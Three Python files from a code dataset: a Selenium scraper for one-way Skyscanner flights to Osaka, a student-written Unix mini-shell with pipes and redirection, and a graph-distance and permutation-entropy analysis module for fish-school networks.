selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pymysql\nfrom selenium.webdriver.chrome.options import Options\n\nmain_url = \"https://www.skyscanner.co.kr/\"\nkeyword = \"오사카\"\n\noptions = Options()\noptions.add_argument('--no-sandbox') # Bypass OS security model\ndriver = webdriver.Chrome(chrome_options=options, executable_path=r'C:\\driver/chromedriver.exe')\ndriver.get(main_url)\ndriver.implicitly_wait(10)\n\n# 편도 클릭\n\none_way = driver.find_element_by_id(\"fsc-trip-type-selector-one-way\")\none_way.click()\ntime.sleep(3)\n\ndestination = driver.find_element_by_css_selector(\"#destination-fsc-search\")\ndestination.clear()\n\ndestination.send_keys(keyword)\n\n\ntime.sleep(3)\nstart_day = 
driver.find_element_by_css_selector(\"#depart-fsc-datepicker-button\")\nstart.click()\n\n#달력에서 동그라미쳐진 날짜 클릭\ntime.sleep(3)\nstart_day = driver.find_element_by_css_selector(\"#depart-fsc-datepicker-popover > div > div > div.fsc-datepicker__container-3azq_ > div > table > tbody > tr:nth-child(3) > td:nth-child(5) > button\")\nstart_day.click()\n# '직항만' 체크\ntime.sleep(3)\ncheck_non_stop = driver.find_element_by_css_selector(\"div.SingleDestControls-2wsUo > label > input\")\ncheck_non_stop.click()\n\n# 항공권 검색 클릭\ntime.sleep(2)\nsearch = driver.find_element_by_css_selector(\"#flights-search-controls-root > div > div > form > div:nth-child(3) > button\")\nsearch.click()","sub_path":"craw_skyscanner.py","file_name":"craw_skyscanner.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"809056","text":"#! /usr/bin/env python3\n#Author: Ethan Benckwitz\nimport os, sys, re\n\ndef main(commands):\n if commands[0] == \"exit\": #exit program\n sys.exit(1)\n elif not commands: #no user input will go through loop again\n return\n elif \"|\" in commands: #check for pipe command\n pipe_command(commands)\n elif commands[0] == \"cd\": #change directories\n directory = commands[1]\n try:\n if len(commands) < 2:\n os.write(2, (\"Provide a directory\\n\").encode())\n elif len(commands) > 2:\n os.write(2, (\"Too much!\\n\").encode()) \n else:\n os.chdir(directory)\n except FileNotFoundError:\n os.write(2, (\"File not found! Please try again!\\n\").encode())\n else: #run shell\n my_shell(commands)\n\ndef my_shell(command):\n pid = os.getpid()\n rc = os.fork()\n args = command\n waiting = True\n if \"&\" in command:\n waiting = False\n command.remove(\"&\")\n\n if rc < 0:\n os.write(2, (\"Fork failed, returning %d\\n\" % rc).encode())\n sys.exit(1)\n\n elif rc == 0: #child\n if \">\" in args:\n redirect = command.index(\">\")\n os.close(1)\n os.open(command[redirect - 1], os.O_CREAT | os.O_WRONLY)\n os.set_inheritable(1, True)\n exec_command(command[0:redirect])\n\n elif \"<\" in args:\n redirect = command.index(\"<\")\n os.close(0)\n os.open(command[redirect + 1], os.O_RDONLY)\n os.set_inheritable(0, True)\n exec_command(command[0:redirect])\n\n elif \"/\" in args: #path names\n program = args[0]\n try:\n os.execve(program, args, os.environ)\n except FileNotFoundError:\n pass\n \n else: exec_command(args)\n\n else:\n if waiting: #background task\n result = os.wait()\n\ndef pipe_command(command):\n pipe = command.index(\"|\")\n \n pr, pw = os.pipe()\n for f in (pr, pw):\n os.set_inheritable(f, True)\n \n rc = os.fork()\n if rc < 0:\n os.write(2, (\"Fork failed, returning %d\\n\" % rc).encode())\n sys.exit(1)\n\n elif rc == 0:\n os.close(1) #redirect child's stdout\n os.dup(pw)\n os.set_inheritable(1, True)\n for fd in (pr, pw):\n os.close(fd)\n exec_command(command[0:pipe])\n os.write(2,(\"%s command not found\"%args[0]).encode())\n sys.exit(1)\n \n else:\n os.close(0)\n os.dup(pr)\n os.set_inheritable(0, True)\n for fd in (pw, pr):\n os.close(fd)\n if \"|\" in command[pipe + 1:]: #second pipe\n pipe_command(command[pipe + 1:])\n exec_command(command[pipe + 1:])\n os.write(2,(\"%s command not found\"%args[0]).encode())\n sys.exit(1)\n \ndef exec_command(args):\n for dir in re.split(\":\", os.environ['PATH']): #try each directory in the path\n program = \"%s/%s\" % (dir, args[0])\n try:\n os.execve(program, args, os.environ) #try to exec program\n except FileNotFoundError: #this is expected\n pass #fail quietly\n \n 
os.write(2, (\"Command %s not found. Try again.\\n\" % args[0]).encode())\n sys.exit(1) #terminate with error\n\nif __name__ == '__main__':\n while True:\n if 'PS1' in os.environ:\n os.write(1, (os.environ['PS1']).encode())\n else:\n os.write(1, (\"$ \").encode())\n try:\n command = os.read(0, 1024)\n except EOFError:\n sys.exit(1)\n except ValueError:\n sys.exit(1)\n\n \n if len(command) == 0: break\n command = command.decode().split(\"\\n\")\n for arg in command:\n main(arg.split())\n\n","sub_path":"shell/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"348059294","text":"import networkx as nx\nimport netrd\nfrom netrd.utilities import entropy, ensure_undirected\nimport numpy as np\nimport pandas as pd\nimport community # install with \"pip install python-louvain\"\nimport cmocean as cmo\nfrom collections import defaultdict\nfrom collections import Counter\nimport scipy as sp\nimport scipy.sparse as sparse\nimport math\nfrom ortools.linear_solver import pywraplp\nimport matplotlib.pyplot as plt\nimport glob\nimport itertools\n\nfrom concurrent.futures import ProcessPoolExecutor, as_completed #for multiprocessing\n\nfrom netrd.distance import PortraitDivergence\nfrom netrd.distance import OnionDivergence\nfrom netrd.distance import DistributionalNBD\nfrom netrd.distance import NetSimile\nfrom netrd.distance import PolynomialDissimilarity\nfrom netrd.distance import CommunicabilityJSD\nfrom netrd.distance import ResistancePerturbation\nfrom netrd.distance import QuantumJSD\nfrom netrd.distance import DeltaCon\nfrom netrd.distance import HammingIpsenMikhailov\nfrom netrd.distance import IpsenMikhailov\nfrom netrd.distance import LaplacianSpectral\nfrom netrd.distance import JaccardDistance\nfrom netrd.distance import DegreeDivergence\nfrom netrd.distance import Frobenius\nfrom netrd.distance import Hamming\nfrom netrd.distance import NetLSD\nfrom netrd.distance import DMeasure\n#from netrd.distance import ResilienceDistance\n\n#from extra_distances import *\n\n\n\ndef LJ(G1, G2):\n D = netrd.distance.LaplacianSpectral()\n d = D.dist(G1, G2, kernel='lorentzian')\n return d\n\n\ndef LE(G1, G2):\n D = netrd.distance.LaplacianSpectral()\n d = D.dist(G1, G2, kernel='lorentzian', measure='euclidean')\n return d\n\n\ndef NJ(G1, G2):\n D = netrd.distance.LaplacianSpectral()\n d = D.dist(G1, G2)\n return d\n\n\ndef NE(G1, G2):\n D = netrd.distance.LaplacianSpectral()\n d = D.dist(G1, G2, measure='euclidean')\n return d\n\ndef dk3Distance():\n \"\"\"\n \n \"\"\"\n\n return\n\n\ndef euclidean_distance(x, y):\n return math.sqrt(sum((a - b)**2 for (a, b) in zip(x, y)))\n\n\ndef nbvals(graph, topk='automatic', batch=100, tol=1e-5):\n \"\"\"Compute the largest-magnitude non-backtracking eigenvalues.\n\n Parameters\n ----------\n\n graph (nx.Graph): The graph.\n\n topk (int or 'automatic'): The number of eigenvalues to compute. The\n maximum number of eigenvalues that can be computed is 2*n - 4, where n\n is the number of nodes in graph. All the other eigenvalues are equal\n to +-1. If 'automatic', return all eigenvalues whose magnitude is\n larger than the square root of the largest eigenvalue.\n\n batch (int): If topk is 'automatic', compute this many eigenvalues at a\n time until the condition is met. Must be at most 2*n - 4; default 100.\n\n tol (float): Numerical tolerance. 
Default 1e-5.\n\n Returns\n -------\n\n An array with the eigenvalues.\n\n \"\"\"\n if not isinstance(topk, str) and topk < 1:\n return np.array([[], []])\n\n # The eigenvalues are left untouched by removing the nodes of degree 1.\n # Moreover, removing them makes the computations faster. This\n # 'shaving' leaves us with the 2-core of the graph.\n core = shave(graph)\n matrix = pseudo_hashimoto(core)\n if not isinstance(topk, str) and topk > matrix.shape[0] - 1:\n topk = matrix.shape[0] - 2\n print('Computing only {} eigenvalues'.format(topk))\n\n if topk == 'automatic':\n batch = min(batch, 2 * graph.order() - 4)\n if 2 * graph.order() - 4 < batch:\n print('Using batch size {}'.format(batch))\n topk = batch\n\n N = matrix.shape[0]\n v0 = np.ones(N) / N\n eigs = lambda k: sparse.linalg.eigs(\n matrix, k=k, v0=v0, return_eigenvectors=False, tol=tol\n )\n\n count = 1\n while True:\n vals = eigs(topk * count)\n largest = np.sqrt(abs(max(vals, key=abs)))\n if abs(vals[0]) <= largest or topk != 'automatic':\n break\n count += 1\n if topk == 'automatic':\n vals = vals[abs(vals) > largest]\n\n # The eigenvalues are returned in no particular order, which may yield\n # different feature vectors for the same graph. For example, if a\n # graph has a + ib and a - ib as eigenvalues, the eigenvalue solver may\n # return [..., a + ib, a - ib, ...] in one call and [..., a - ib, a +\n # ib, ...] in another call. To avoid this, we sort the eigenvalues\n # first by absolute value, then by real part, then by imaginary part.\n vals = sorted(vals, key=lambda x: x.imag)\n vals = sorted(vals, key=lambda x: x.real)\n vals = np.array(sorted(vals, key=np.linalg.norm))\n\n # Return eigenvalues as a 2D array, with one row per eigenvalue, and\n # each row containing the real and imaginary parts separately.\n vals = np.array([(z.real, z.imag) for z in vals])\n return vals\n\n\ndef shave(graph):\n \"\"\"Return the 2-core of a graph.\n\n Iteratively remove the nodes of degree 0 or 1, until all nodes have\n degree at least 2.\n\n \"\"\"\n core = graph.copy()\n while True:\n to_remove = [node for node, neighbors in core.adj.items()\n if len(neighbors) < 2]\n core.remove_nodes_from(to_remove)\n if len(to_remove) == 0:\n break\n return core\n\n\ndef pseudo_hashimoto(graph):\n \"\"\"Return the pseudo-Hashimoto matrix.\n\n The pseudo Hashimoto matrix of a graph is the block matrix defined as\n B' = [0 D-I]\n [-I A ]\n\n Where D is the degree-diagonal matrix, I is the identity matrix and A\n is the adjacency matrix. The eigenvalues of B' are always eigenvalues\n of B, the non-backtracking or Hashimoto matrix.\n\n Parameters\n ----------\n\n graph (nx.Graph): A NetworkX graph object.\n\n Returns\n -------\n\n A sparse matrix in csr format.\n\n \"\"\"\n # Note: the rows of nx.adjacency_matrix(graph) are in the same order as\n # the list returned by graph.nodes().\n degrees = graph.degree()\n degrees = sparse.diags([degrees[n] for n in graph.nodes()])\n adj = nx.adjacency_matrix(graph)\n ident = sparse.eye(graph.order())\n pseudo = sparse.bmat([[None, degrees - ident], [-ident, adj]])\n return pseudo.asformat('csr')\n\n\ndef half_incidence(graph, ordering='blocks', return_ordering=False):\n \"\"\"Return the 'half-incidence' matrices of the graph.\n\n If the graph has n nodes and m *undirected* edges, then the\n half-incidence matrices are two matrices, P and Q, with n rows and 2m\n columns. That is, there is one row for each node, and one column for\n each *directed* edge. 
For P, the entry at (n, e) is equal to 1 if node\n n is the source (or tail) of edge e, and 0 otherwise. For Q, the entry\n at (n, e) is equal to 1 if node n is the target (or head) of edge e,\n and 0 otherwise.\n\n Parameters\n ----------\n\n graph (nx.Graph): The graph.\n\n ordering (str): If 'blocks' (default), the two columns corresponding to\n the i'th edge are placed at i and i+m. That is, choose an arbitarry\n direction for each edge in the graph. The first m columns correspond\n to this orientation, while the latter m columns correspond to the\n reversed orientation. Columns are sorted following graph.edges(). If\n 'consecutive', the first two columns correspond to the two orientations\n of the first edge, the third and fourth row are the two orientations of\n the second edge, and so on. In general, the two columns for the i'th\n edge are placed at 2i and 2i+1.\n\n return_ordering (bool): if True, return a function that maps an edge id\n to the column placement. That is, if ordering=='blocks', return the\n function lambda x: (x, m+x), if ordering=='consecutive', return the\n function lambda x: (2*x, 2*x + 1). If False, return None.\n\n\n Returns\n -------\n\n P (sparse matrix), Q (sparse matrix), ordering (function or None).\n\n\n Notes\n -----\n\n The nodes in graph must be labeled by consecutive integers starting at\n 0. This function always returns three values, regardless of the value\n of return_ordering.\n\n \"\"\"\n numnodes = graph.order()\n numedges = graph.size()\n\n if ordering == 'blocks':\n src_pairs = lambda i, u, v: [(u, i), (v, numedges + i)]\n tgt_pairs = lambda i, u, v: [(v, i), (u, numedges + i)]\n if ordering == 'consecutive':\n src_pairs = lambda i, u, v: [(u, 2 * i), (v, 2 * i + 1)]\n tgt_pairs = lambda i, u, v: [(v, 2 * i), (u, 2 * i + 1)]\n\n def make_coo(make_pairs):\n \"\"\"Make a sparse 0-1 matrix.\n\n The returned matrix has a positive entry at each coordinate pair\n returned by make_pairs, for all (idx, node1, node2) edge triples.\n\n \"\"\"\n coords = list(\n zip(\n *(\n pair\n for idx, (node1, node2) in enumerate(graph.edges())\n for pair in make_pairs(idx, node1, node2)\n )\n )\n )\n data = np.ones(2 * graph.size())\n return sparse.coo_matrix((data, coords), shape=(numnodes, 2*numedges))\n\n src = make_coo(src_pairs).asformat('csr')\n tgt = make_coo(tgt_pairs).asformat('csr')\n\n if return_ordering:\n if ordering == 'blocks':\n func = lambda x: (x, numedges + x)\n else:\n func = lambda x: (2 * x, 2 * x + 1)\n return src, tgt, func\n else:\n return src, tgt\n\n\n\ndef NonBacktrackingSpectral(G1, G2, topk='automatic', batch=100, tol=1e-5):\n \"\"\"Non-Backtracking Distance between two graphs.\n\n Parameters\n ----------\n\n G1, G2 (nx.Graph)\n The graphs to compare.\n\n topk (int or 'automatic')\n The number of eigenvalues to compute. If `'automatic'` (default),\n use only the eigenvalues that are larger than the square root\n of the largest eigenvalue. Note this may yield different\n number of eigenvalues for each graph.\n\n batch (int)\n If topk is `'automatic'`, this is the number of eigenvalues to\n compute each time until the condition is met. 
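Each attempt re-runs the sparse eigensolver on a larger request, so a bigger batch means fewer solver calls. 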
Default\n :math:`100`.\n\n tol (float)\n Numerical tolerance when computing eigenvalues.\n\n Returns\n -------\n float\n The distance between `G1` and `G2`\n\n \"\"\"\n vals1 = nbvals(G1, topk, batch, tol)\n vals2 = nbvals(G2, topk, batch, tol)\n\n vals1 = [tuple(vals1[i]) for i in range(len(vals1))]\n vals2 = [tuple(vals2[i]) for i in range(len(vals2))]\n\n dist = earthmover_distance(vals1, vals2)\n\n return dist\n\n\ndef earthmover_distance(p1, p2):\n '''\n Output the Earthmover distance between the two given points.\n Arguments:\n - p1: an iterable of hashable iterables of numbers (i.e., list of tuples)\n - p2: an iterable of hashable iterables of numbers (i.e., list of tuples)\n '''\n dist1 = {x: count / len(p1) for (x, count) in Counter(p1).items()}\n dist2 = {x: count / len(p2) for (x, count) in Counter(p2).items()}\n solver = pywraplp.Solver('earthmover_distance',\n pywraplp.Solver.GLOP_LINEAR_PROGRAMMING)\n\n variables = dict()\n\n # for each pile in dist1, constraint says all the dirt must leave this pile\n dirt_leaving_constraints = defaultdict(lambda: 0)\n\n # for each hole in dist2, constraint says this hole must be filled\n dirt_filling_constraints = defaultdict(lambda: 0)\n\n # the objective\n objective = solver.Objective()\n objective.SetMinimization()\n\n for (x, dirt_at_x) in dist1.items():\n for (y, capacity_of_y) in dist2.items():\n amount_to_move_x_y = solver.NumVar(0,\n solver.infinity(),\n 'z_{%s, %s}' % (x, y))\n variables[(x, y)] = amount_to_move_x_y\n dirt_leaving_constraints[x] += amount_to_move_x_y\n dirt_filling_constraints[y] += amount_to_move_x_y\n objective.SetCoefficient(amount_to_move_x_y,\n sp.spatial.distance.euclidean(x, y))\n\n for x, linear_combination in dirt_leaving_constraints.items():\n solver.Add(linear_combination == dist1[x])\n\n for y, linear_combination in dirt_filling_constraints.items():\n solver.Add(linear_combination == dist2[y])\n\n status = solver.Solve()\n if status not in [solver.OPTIMAL, solver.FEASIBLE]:\n raise Exception('Unable to find feasible solution')\n\n for ((x, y), variable) in variables.items():\n if variable.solution_value() != 0:\n cost = euclidean_distance(x, y) * variable.solution_value()\n\n return objective.Value()\n\ndef matusita_dist(X, Y):\n r\"\"\"\n Return the Matusita distance between two vectors, $X$ and $Y$\n $$\n \\sqrt{\\sum_i \\sum_j \\left( \\sqrt{X_{ij}} - \\sqrt{Y_{ij}} \\right)^{2}}\n $$\n\n Params\n ------\n X (np.ndarray): the first vector to compare\n Y (np.ndarray): the second vector to compare\n\n Returns\n -------\n d (float): the Matusita distance between X and Y\n\n \"\"\"\n return np.sqrt(np.sum(np.square(np.sqrt(X) - np.sqrt(Y))))\n\ndef dk2Distance(G1, G2):\n r\"\"\"Compute the distance between two graphs by using the Jensen-Shannon\n divergence between the :math:`2k`-series of the graphs.\n The :math:`dk`-series of a graph is the collection of distributions of\n size :math:`d` subgraphs, where nodes are labelled by degrees. For\n simplicity, we consider only the :math:`2k`-series, i.e., the\n distribution of edges between nodes of degree :math:`(k_i, k_j)`. The\n distance between these :math:`2k`-series is calculated using the\n Jensen-Shannon divergence.\n Parameters\n ----------\n G1, G2 (nx.Graph)\n two networkx graphs to be compared\n Returns\n -------\n dist (float)\n the distance between `G1` and `G2`.\n References\n ----------\n .. [1] Orsini, Chiara, Marija M. Dankulov, Pol Colomer-de-Simon,\n Almerima Jamakovic, Priya Mahadevan, Amin Vahdat, Kevin E.\n Bassler, et al. 2015. 
Quantifying Randomness in Real Networks.\n Nature Communications 6 (1). https://doi.org/10.1038/ncomms9627.\n \"\"\"\n\n def dk2_series(G):\n \"\"\"\n Calculate the 2k-series (i.e. the number of edges between\n degree-labelled edges) for G.\n \"\"\"\n\n k_dict = dict(nx.degree(G))\n dk2 = defaultdict(int)\n\n for (i, j) in G.edges:\n k_i = k_dict[i]\n k_j = k_dict[j]\n if k_i <= k_j:\n dk2[(k_i, k_j)] += 1\n else:\n dk2[(k_j, k_i)] += 1\n\n # every edge should be counted once\n assert sum(list(dk2.values())) == G.size()\n\n return dk2\n\n G1 = ensure_undirected(G1)\n G2 = ensure_undirected(G2)\n\n G1_dk = dk2_series(G1)\n G2_dk = dk2_series(G2)\n\n N = max(len(G1), len(G2))\n\n # note N^2 dense matrices \n D1 = np.zeros((N, N))\n D2 = np.zeros((N, N))\n\n for (i, j), k in G1_dk.items():\n D1[i, j] = k\n for (i, j), k in G2_dk.items():\n D2[i, j] = k\n\n # these should be normalized by the number of edges\n D1 = D1 / G1.size()\n D2 = D2 / G2.size()\n\n # flatten matrices. this is safe because we've padded to the same size\n G1_dk_normed = D1[np.triu_indices(N)].ravel()\n G2_dk_normed = D2[np.triu_indices(N)].ravel()\n\n assert np.isclose(G1_dk_normed.sum(), 1)\n assert np.isclose(G2_dk_normed.sum(), 1)\n\n dist = entropy.js_divergence(G1_dk_normed, G2_dk_normed)\n# self.results[\"dist\"] = dist\n\n return dist\n\n\ndef get_entropies(handle):\n for fn in glob.glob('/media/recnodes/recnode_2mfish/*' + handle +'*'):\n ret, pf = stims.sync_data(pd.read_pickle(fn+'track/perframe_stats.pickle'), stims.get_logfile(slashdir(fn)), imgstore.new_for_filename(slashdir(fn) + 'metadata.yaml'))\n \n # FINISH ME PLEASE\n return \n \n \ndef check_networks(G, ideal_size=150, min_index=1):\n\n missing = [str(x) for x in list(set(list(range(min_index,ideal_size+min_index))) - set(list([int(x) for x in G.nodes()])))]\n if len(missing) > 0:\n for i in missing:\n # np.random.choice needs a sequence, not a NodeView\n G.add_edge(i, np.random.choice(list(G.nodes())))\n \n while not nx.is_connected(G):\n # join a random node from the smallest component to a random node from the largest\n minG = min(nx.connected_components(G), key=len)\n maxG = max(nx.connected_components(G), key=len)\n rand_i = np.random.choice(list(minG))\n rand_j = np.random.choice(list(maxG))\n G.add_edge(rand_i, rand_j)\n \n return G \n\ndef s_entropy(freq_list):\n ''' This function computes the Shannon entropy of a given frequency distribution.\n USAGE: shannon_entropy(freq_list)\n ARGS: freq_list = Numeric vector representing the frequency distribution\n OUTPUT: A numeric value representing Shannon's entropy'''\n freq_list = [element for element in freq_list if element != 0]\n sh_entropy = 0.0\n for freq in freq_list:\n sh_entropy += freq * np.log(freq)\n sh_entropy = -sh_entropy\n return(sh_entropy)\n\ndef ordinal_patterns(ts, embdim, embdelay):\n ''' This function computes the ordinal patterns of a time series\n for a given embedding dimension and embedding delay.\n USAGE: ordinal_patterns(ts, embdim, embdelay)\n ARGS: ts = Numeric vector representing the time series,\n embdim = embedding dimension (3<=embdim<=7 preferred range), embdelay = embedding delay\n OUTPUT: A numeric vector representing frequencies of ordinal patterns'''\n time_series = ts\n possible_permutations = list(itertools.permutations(range(embdim)))\n lst = list()\n for i in range(len(time_series) - embdelay * (embdim - 1)):\n sorted_index_array = list(np.argsort(time_series[i:(embdim+i)]))\n lst.append(sorted_index_array)\n lst = np.array(lst)\n element, freq = np.unique(lst, 
return_counts = True, axis = 0)\n freq = list(freq)\n # pad with zeros so every possible permutation has an entry\n if len(freq) != len(possible_permutations):\n for i in range(len(possible_permutations)-len(freq)):\n freq.append(0)\n return(freq)\n\ndef p_entropy(op):\n ordinal_pat = op\n max_entropy = np.log(len(ordinal_pat))\n p = np.divide(np.array(ordinal_pat), float(sum(ordinal_pat)))\n return(s_entropy(p)/max_entropy)\n\ndef complexity(op):\n ''' \n This function computes the complexity of a time series\n defined as: Comp_JS = Q_o * JSdivergence * pe\n Q_o = Normalizing constant\n JSdivergence = Jensen-Shannon divergence\n pe = permutation entropy\n ARGS: ordinal pattern\n '''\n pe = p_entropy(op)\n constant1 = (0.5+((1 - 0.5)/len(op)))* np.log(0.5+((1 - 0.5)/len(op)))\n constant2 = ((1 - 0.5)/len(op))*np.log((1 - 0.5)/len(op))*(len(op) - 1)\n constant3 = 0.5*np.log(len(op))\n Q_o = -1/(constant1+constant2+constant3)\n\n temp_op_prob = np.divide(op, sum(op))\n temp_op_prob2 = (0.5*temp_op_prob)+(0.5*(1/len(op)))\n JSdivergence = (s_entropy(temp_op_prob2) - 0.5 * s_entropy(temp_op_prob) - 0.5 * np.log(len(op)))\n Comp_JS = Q_o * JSdivergence * pe\n return(Comp_JS)\n\ndef weighted_ordinal_patterns(ts, embdim, embdelay):\n time_series = ts\n possible_permutations = list(itertools.permutations(range(embdim)))\n temp_list = list()\n wop = list()\n for i in range(len(time_series) - embdelay * (embdim - 1)):\n Xi = time_series[i:(embdim+i)]\n Xn = time_series[(i+embdim-1): (i+embdim+embdim-1)]\n Xi_mean = np.mean(Xi)\n Xi_var = (Xi-Xi_mean)**2\n weight = np.mean(Xi_var)\n sorted_index_array = list(np.argsort(Xi))\n temp_list.append([''.join(map(str, sorted_index_array)), weight])\n result = pd.DataFrame(temp_list,columns=['pattern','weights'])\n freqlst = dict(result['pattern'].value_counts())\n for pat in (result['pattern'].unique()):\n wop.append(np.sum(result.loc[result['pattern']==pat,'weights'].values))\n return(wop)\n\ndef average_every_n(xvec, yvec, n=2):\n \"\"\"\n Utility function that spits out a smoothed x and y vector\n \n Parameters\n ----------\n xvec, yvec (np.array): vectors of x and y data\n n (int): average every n terms together\n \n Returns\n -------\n out_x, out_y (np.array): two smoothed vectors according to\n however many n were specified\n \"\"\"\n \n out_x = []\n out_y = []\n \n min_xdiff = xvec[1] - xvec[0]\n \n for i in range(0,len(xvec),n):\n xnumerat = 0\n ynumerat = 0\n \n if i + n <= len(xvec):\n for j in range(n):\n xnumerat += xvec[i+j]\n ynumerat += yvec[i+j]\n \n out_x.append(xnumerat / n)\n out_y.append(ynumerat / n)\n \n out_x = np.array(out_x)\n out_y = np.array(out_y)\n\n if n > 1:\n out_x = out_x + min_xdiff / n\n \n return out_x, out_y \n\n\n\n######## Here begins Danno's madness #####################\n\n\n\ndef serialDistanceMeasures(chunk, distance_measures):\n \"\"\"\n chunk = a (slice of a) dict containing all network info (eg myDict[i] = nx.read_graphml(filelist[i]))\n distance_measures = a dict of distance calculations with name as key and functions as items\n \n \"\"\"\n global ERROR_COUNT # module-level tally; without this declaration the increment below raises UnboundLocalError\n results = pd.DataFrame()\n for gi in list(chunk.keys())[:-1]:\n G0 = check_networks(chunk[gi])\n G1 = check_networks(chunk[gi+1])\n distances = [] \n if gi%20000==0:\n print(gi)\n for fxn in distance_measures:\n try:\n distances.append(distance_measures[fxn](G0, G1))\n except Exception as e:\n distances.append(np.nan)\n print(\"ERROR DURING DISTANCE\", e)\n ERROR_COUNT += 1\n results = results.append(pd.Series(distances, index=distance_measures.keys(), name=gi)) \n return results.sort_index() \n \n \ndef 
parallelProcessMyDictAsSerial(FXN, NETS, nCores, **KWARGS): \n \"\"\"\n NETS = a dictionary of networkx networks, with frame number as keys and nx.graph objects as items\n *** uses global good_dists to define which network distance measures to calculate ***\n returns a dataframe\n \"\"\"\n # SETUP PARALLEL PROCESSING\n\n ppe = ProcessPoolExecutor(nCores)\n futures = []\n Results = []\n\n #DIVIDE DATA INTO CHUNKS\n \n #BINS = list(np.arange(min(NETS.keys()), max(NETS.keys()), int(len(NETS)/nCores))) \n BINS = [int(x) for x in np.linspace(min(NETS.keys()), max(NETS.keys()), nCores+1)]\n BINS[-1] -=1 #subtract 1 because in all except the last case we add 1\n\n # INITIATE PARALLEL PROCESSES\n for n in np.arange(nCores):\n #slice NETS, adding one to the end for distance calcs\n # is there no better way than this to slice a dict?\n CHUNK = {key:NETS[key] for key in np.arange(BINS[n], BINS[n+1]+1)} \n p = ppe.submit(FXN, CHUNK, **KWARGS)\n futures.append(p)\n\n # COLLECT PROCESSED DATA AS IT IS FINISHED \n for future in as_completed(futures):\n stats = future.result()\n Results.append(stats)\n\n return pd.concat(Results)\n \n \ndef plot_network_distances(fish_dict, fish_distance):\n\n from matplotlib import gridspec\n fig = plt.figure(dpi=300, figsize=(11,13))\n ns = 10\n lw = 0.5\n ew = 1\n ncols = 5\n nrows = 11\n nv = 2\n\n\n dents = []\n for di, j in enumerate(list(range(1,len(good_dists)+1))):\n dtype = list(good_dists.keys())[di]\n \n dists_i = fish_distance[dtype]\n dents.append(p_entropy(ordinal_patterns(dists_i, 4, 1)))\n \n \n gs = gridspec.GridSpec(len(good_dists)+1, ncols, width_ratios=[1]*ncols, height_ratios=[2]+[1]*len(good_dists))\n G_f = fish_dict[min(fish_dict.keys())]\n G_f = check_networks(G_f)\n pos = nx.kamada_kawai_layout(G_f)\n pos = nx.spring_layout(G_f, pos=pos, iterations=1)\n partition = community.best_partition(G_f)\n comms = np.array([partition[i] for i in G_f.nodes()])\n node_colors_co = [colors[i] for i in comms]\n\n ginds = np.arange(min(fish_dict.keys()), len(fish_dict), int(len(fish_dict)/ncols)) + min(fish_dict.keys())\n #ginds = [1950, 1975, 2000, 2025, 2049]\n\n\n\n for i in range(ncols):\n axi = plt.subplot(gs[i])\n Gt_i = fish_dict[ginds[i]]\n partition = community.best_partition(Gt_i)\n comms = np.array([partition[i] for i in Gt_i.nodes()])\n node_colors_co = [colors[i] for i in comms]\n pos = nx.kamada_kawai_layout(Gt_i)\n pos = nx.spring_layout(Gt_i, pos=pos, iterations=1)\n\n nx.draw_networkx_nodes(Gt_i, pos, node_color=node_colors_co, edgecolors='#333333',\n node_size=ns, linewidths=lw, alpha=0.95, ax=axi)\n nx.draw_networkx_edges(Gt_i, pos, edge_color=\"#999999\", width=ew, alpha=0.35, ax=axi)\n axi.set_axis_off()\n axi.set_title(\"t = %i\"%ginds[i], fontsize=9)\n \n \n for di, j in enumerate(list(range(1,len(good_dists)+1))):\n axi = plt.subplot(gs[j,:])\n dtype = list(good_dists.keys())[di]\n \n dists_i = fish_distance[dtype]\n \n xvals = np.array(list(range(1,len(fish_dict)-2)))\n yvals = np.array(dists_i)\n yvals = (yvals-yvals.min()) / (yvals.max()-yvals.min())\n xvals, yvals = average_every_n(xvals, yvals, nv)\n \n # cc = cmo.cm.curl((yvals[:-10].mean()-yvals[:10].mean()) / 0.5) \n cval = np.array((dents-min(dents))/(max(dents)-min(dents)))\n cc = cmo.cm.thermal(cval[di]*0.85 + 0.075)\n \n axi.plot(xvals, yvals, linewidth=1.0, color='#333333')\n axi.plot(xvals, yvals, linewidth=1.0, color=cc, label=dtype, alpha=0.9)\n \n axi.legend(loc=1, framealpha=0.85)\n\n xticks = np.array(list(range(0,max(fish_dict.keys())+1,200)))\n yticks = 
np.linspace(0,1,3)\n axi.set_xticks(xticks)\n axi.set_yticks(yticks)\n axi.set_yticklabels(yticks, fontsize=6)\n axi.set_ylabel(r'$d(G_{t}, G_{t+1})$', fontsize=8)\n axi.set_xlim(-0.25, len(fish_dict)-1.25)\n axi.set_ylim(-0.075, 1.075)\n \n axi.grid(linewidth=1.5, color='#999999', alpha=0.3)\n \n if j != nrows-1:\n axi.set_xticklabels(['']*len(xticks))\n \n else:\n axi.set_xticklabels(xticks)\n axi.set_xlabel('Time', fontsize=14)\n\n # plt.savefig(\"../figs/pngs/sample_distances_fish.png\", dpi=425, bbox_inches='tight')\n # plt.savefig(\"../figs/pdfs/sample_distances_fish.pdf\", dpi=425, bbox_inches='tight')\n\n \n return fig\n \n\n\ntitles_of_dists = [\"JaccardDistance\", \n \"Hamming\", \n \"HammingIpsenMikhailov\", \n \"Frobenius\", \n \"PolynomialDissimilarity\", \n \"DegreeDivergence\", \n# \"dK2Distance\", \n \"PortraitDivergence\",\n# \"OnionDivergence\",\n \"QuantumJSD\",\n \"CommunicabilitySequence\", \n# \"ResilienceDistance\",\n \"ResistancePerturbation\", \n \"NetLSD\",\n \"LaplacianSpectralLorenzJSD\", \n \"LaplacianSpectralGaussianJSD\", \n \"LaplacianSpectralLorenzEuc\",\n \"IpsenMikhailov\", \n \"NonBacktrackingDistance\",\n \"DistributionalNBD\",\n \"D-measure\",\n \"DeltaCon\",\n \"NetSimile\"\n ]\n\ndist_functions={'LaplacianSpectralLorenzJSD': LJ,\\\n 'LaplacianSpectralLorenzEuc': LE,\\\n 'LaplacianSpectralGaussianJSD': NJ,\\\n 'NonBacktrackingDistance': NonBacktrackingSpectral,\\\n 'dK2Distance': dk2Distance,\\\n }\n\nadditional_dists={\n 'PolynomialDissimilarity': PolynomialDissimilarity(),\\\n 'JaccardDistance': JaccardDistance(), \\\n 'Hamming': Hamming(), \\\n 'HammingIpsenMikhailov': 